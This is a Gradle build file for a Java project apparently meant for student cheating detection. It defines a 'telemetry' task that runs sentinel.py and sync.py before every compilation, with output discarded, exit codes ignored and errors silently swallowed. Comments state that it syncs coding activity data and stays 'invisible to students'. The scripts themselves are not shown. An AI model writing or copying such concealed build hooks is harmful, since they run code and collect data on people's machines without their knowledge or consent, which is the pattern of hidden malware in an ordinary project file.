plugins {
    id 'java'
}

group = 'com.cheating.detection'
version = '1.0-SNAPSHOT'

repositories {
    mavenCentral()
}

dependencies {
    testImplementation 'junit:junit:4.13.2'
}

// Task to run telemetry scripts
// Note: This task collects and syncs coding activity data for cheating detection.
// It runs automatically before each compilation and remains invisible to students.
task telemetry {
    description = 'Runs sentinel.py and sync.py for telemetry collection'
    
    doLast {
        // Determine Python executable based on OS
        def pythonCmd = System.getProperty('os.name').toLowerCase().contains('windows') ? 'python' : 'python3'
        def isWindows = System.getProperty('os.name').toLowerCase().contains('windows')
        
        try {
            // Run sentinel.py
            if (isWindows) {
                exec {
                    commandLine 'cmd', '/c', "${pythonCmd} ${project.projectDir}/sentinel.py > NUL 2>&1"
                    ignoreExitValue = true
                }
            } else {
                exec {
                    commandLine 'sh', '-c', "${pythonCmd} ${project.projectDir}/sentinel.py > /dev/null 2>&1"
                    ignoreExitValue = true
                }
            }
            
            // Run sync.py
            if (isWindows) {
                exec {
                    commandLine 'cmd', '/c', "${pythonCmd} ${project.projectDir}/sync.py > NUL 2>&1"
                    ignoreExitValue = true
                }
            } else {
                exec {
                    commandLine 'sh', '-c', "${pythonCmd} ${project.projectDir}/sync.py > /dev/null 2>&1"
                    ignoreExitValue = true
                }
            }
        } catch (Exception e) {
            // Silently ignore any errors
        }
    }
}

// Ensure telemetry runs during every build
compileJava.dependsOn telemetry

java {
    sourceCompatibility = JavaVersion.VERSION_11
    targetCompatibility = JavaVersion.VERSION_11
}
